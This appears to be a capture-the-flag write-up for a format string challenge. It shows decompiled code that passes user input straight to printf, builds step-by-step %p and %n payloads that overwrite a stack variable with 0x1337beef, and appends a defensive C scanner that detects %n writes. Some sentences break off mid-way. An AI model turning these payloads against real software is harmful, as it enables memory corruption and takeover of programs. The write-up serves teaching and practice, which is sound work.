We start by downloading the source files.
We are given a binary
long local_48;
long *local_40;
undefined8 user_input;
...
read(0,&user_input,0x1f);
printf("\n[!] Checking.. ");
printf((char *)&user_input);
if (local_48 == 0x1337beef) {
    delulu();
}
The function
You can find more information about format string exploits here.
Let's build our payload step by step:
AAAAAAAA%8$p
This returns our 8th argument in the stack, which is our 8 A's. (We can use
AAAAAAAA%7$n
This writes 8 to the 7th argument in the stack, which is
We need to write 0x1337beef, so printf has to output 0x1337beef characters before it reaches the %7$n. This is 322420463 characters in decimal.
We can do this with the following payload:
%322420463x%7$n
Connecting to the server and providing this input gives us the flag after 'some' time:
1c157380
You managed to deceive the robot, here's your new identity: HTB{m45t3r_0f_d3c3pt10n}
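The arithmetic behind the payloads above can be checked without passing untrusted data to printf. The following scanner is an added example, not part of the original write-up or the challenge binary: it walks a string the way printf would and reports whether it contains a %n write, which positional argument it targets, and what value would be stored. The names scan_format and struct n_write are hypothetical; it assumes each padded conversion outputs exactly its field width (true here, since %x prints at most 8 digits) and does not model `*` widths.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* What a %n directive in an untrusted string would do if printf ran it. */
struct n_write {
    int found;           /* 1 if a %n directive is present */
    unsigned long arg;   /* positional index (the 7 in %7$n), 0 if none */
    unsigned long count; /* bytes output before it, i.e. the value stored */
};

/* Walk the string the way printf would, without ever formatting it. */
struct n_write scan_format(const char *s)
{
    struct n_write r = {0, 0, 0};
    char *end;
    while (*s) {
        if (*s++ != '%') { r.count++; continue; }       /* literal byte */
        if (*s == '%') { r.count++; s++; continue; }    /* "%%" prints one % */
        unsigned long pos = 0, width = 0;
        if (isdigit((unsigned char)*s)) {                /* N$ or a width */
            unsigned long num = strtoul(s, &end, 10);
            if (*end == '$') { pos = num; s = end + 1; }
        }
        while (*s && strchr("-+ #0'", *s)) s++;          /* flags */
        if (isdigit((unsigned char)*s)) { width = strtoul(s, &end, 10); s = end; }
        if (*s == '.') { s++; while (isdigit((unsigned char)*s)) s++; }
        while (*s && strchr("hlqjztL", *s)) s++;         /* length modifiers */
        if (*s == '\0') break;                           /* cut-off directive */
        if (*s == 'n') { r.found = 1; r.arg = pos; return r; }
        r.count += width;  /* assumption: output is exactly the field width */
        s++;
    }
    return r;
}

int main(void)
{
    /* Constructed inputs: the three strings from the write-up. */
    const char *in[] = { "AAAAAAAA%8$p", "AAAAAAAA%7$n", "%322420463x%7$n" };
    for (size_t i = 0; i < 3; i++) {
        struct n_write r = scan_format(in[i]);
        printf("%-16s found=%d arg=%lu count=%#lx\n", in[i], r.found, r.arg, r.count);
    }
    return 0;
}
```

The same scan can be run over logged input to flag strings that carry a %n directive; the underlying fix in the binary is to pass the buffer as data, `printf("%s", buf)`, instead of as the format.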